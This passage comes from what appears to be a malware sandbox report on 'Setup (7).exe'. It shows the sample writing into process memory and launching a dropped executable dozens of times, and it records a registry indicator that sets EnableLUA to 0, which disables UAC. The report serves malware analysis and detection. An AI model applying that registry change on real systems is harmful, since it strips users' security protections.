memory of 2544 4600 Setup (7).exe 102 PID 4600 wrote to memory of 2544 4600 Setup (7).exe 102 PID 4600 wrote to memory of 1520 4600 Setup (7).exe 117 PID 4600 wrote to memory of 1520 4600 Setup (7).exe 117 PID 4600 wrote to memory of 2272 4600 Setup (7).exe 116 PID 4600 wrote to memory of 2272 4600 Setup (7).exe 116 PID 4600 wrote to memory of 2272 4600 Setup (7).exe 116 PID 4600 wrote to memory of 1388 4600 Setup (7).exe 115 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" jAkEf6fFJtpWep78XXvMZnjX.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (7).exe"C:\Users\Admin\AppData\Local\Temp\Setup (7).exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe"C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1136 -
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
- Executes dropped EXE
PID:2172
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
- Executes dropped EXE
PID:5540
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
- Executes dropped EXE
PID:1332
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
- Executes dropped EXE
PID:4128
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
PID:4432
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
- Executes dropped EXE
PID:1468
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
- Executes dropped EXE
PID:1940
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:4968
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:4064
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:5492
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:2948
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:1512
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6168
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6416
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6656
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:4528
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6908
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:1512
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:2368
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:3732
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6856
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:4640
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:5272
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6688
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:4056
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:5724
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:5940
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:1504
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:2552
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:5424
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7092
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:3796
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:3756
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:3588
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7620
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:8004
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7304
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7180
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6276
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7860
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7668
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7032
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:2392
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7372
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:4932
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7280
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6248
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:5752
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
- Windows security modification
PID:6000
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:8120
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
- Executes dropped EXE
PID:4968
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:500
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:5912
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6368
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7796
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:5828
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:908
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:1620
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:4024
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:3460
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:884
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:3176
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:1428
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7588
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6668
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7104
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6176
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6744
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:8012
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:4400
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6948
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6948 -s 1644⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4028
-
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:724
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
- Executes dropped EXE
PID:5916
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:5456
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7556
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:820
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:1076
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:5344
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:8048
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6284
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:5928
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6556
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6120
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7012
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:3120
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:688
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6112
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:2536
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7528
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:3076
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7552
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:1040
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6356
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:2544
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6628
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:8216
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:8572
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:8888
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:4460
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7296
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:4896
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:1944
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:4796
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:5036
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9868
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:10064
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9720
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9976
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:10524
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10524 -s 284⤵
- Program crash
PID:11204
-
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:10796
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:10420
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7956
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9036
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7968
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9284
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:8344
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:8288
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:11708
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:10212
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10212 -s 284⤵
- Program crash
PID:9556
-
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9160
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9980
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:11224
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:1648
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9276
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:10044
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:11268
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6272
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:11396
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:2820
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:11196
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:12560
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:12864
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:13160
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:7444
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:11936
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:2712
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:12716
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:10168
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:10440
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:12908
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:11060
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:5196
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9508
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:6864
-
-
C:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exeC:\Users\Admin\Documents\ZFjqdvUVGG4soKAHBCOsWL6w.exe3⤵PID:9472
-
-
